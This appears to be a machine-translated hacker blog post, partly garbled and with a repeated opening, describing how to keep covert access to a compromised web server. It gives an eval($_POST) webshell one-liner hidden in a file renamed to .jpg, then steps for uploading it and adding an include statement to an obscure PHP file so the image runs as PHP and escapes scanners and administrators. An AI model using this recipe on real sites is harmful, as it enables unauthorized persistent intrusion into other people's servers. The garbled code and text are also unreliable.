Two days ago, nginx and IIS7 both cracked the parsing vulnerability and lost several shells, so they wanted to find a super hidden backdoor method. Inadvertently found that the include function can parse arbitrary files into php for execution. search for include function vulnerabilities on the Internet, with few results. most of them are about file inclusion vulnerabilities, such as using variables as contained objects.
Two days ago, nginx and IIS7 both cracked the parsing vulnerability and lost several shells, so they wanted to find a super hidden backdoor method. I was accidentally discoveredNcThe lude function can resolve any filePhpRun. search for include function vulnerabilities on the Internet, with few results. most of them are about file inclusion vulnerabilities. For example, variables are used as contained objects. This is only for programs, not for include () functions in php. I have not seen any article about parsing arbitrary files into php by using this function, so it is now called original. contact me if you have found it. haha, if there is no .. this vulnerability was discovered by me.
Include(linuxso.jpg); and so on, all of them are executed as php. because it is a problem with the php function library, it has nothing to do with the web server and the system. In theory, apache, IIS, nginx or other web servers are acceptable. I only tried apache and nginx, and the test was successful. The test method is relatively simple and I will not talk about it here. What is the purpose of this vulnerability? Currently, I am using it to create a super hidden web backdoor after obtaining the web shell. Other functions can be used freely. experiment begins.
The administrators feel that there is no hidden danger.
It is recommended that the content of a new linuxso.txt file be as follows:
Eval($ _ POST [linuxso]);?>)?> // The function is to open a linuxso. php file in the current directory and write a sentence
|
Rename linuxso.jpg
2. Find an image directory and upload jpg. Write down the path.
Find a PHP file that is almost useless in a deep directory, such as class. archive_read.php, and add an include statement (.../../xxx/linuxso.jpg); // find out the relative path.
3. Access linuxso. php
Connect a sentence. upload a Trojan. after playing, remember to delete the pony. in this way, he can find any tool to scan the network horse .. we cannot find our horse. gaga, unless... the administrator who has read this article.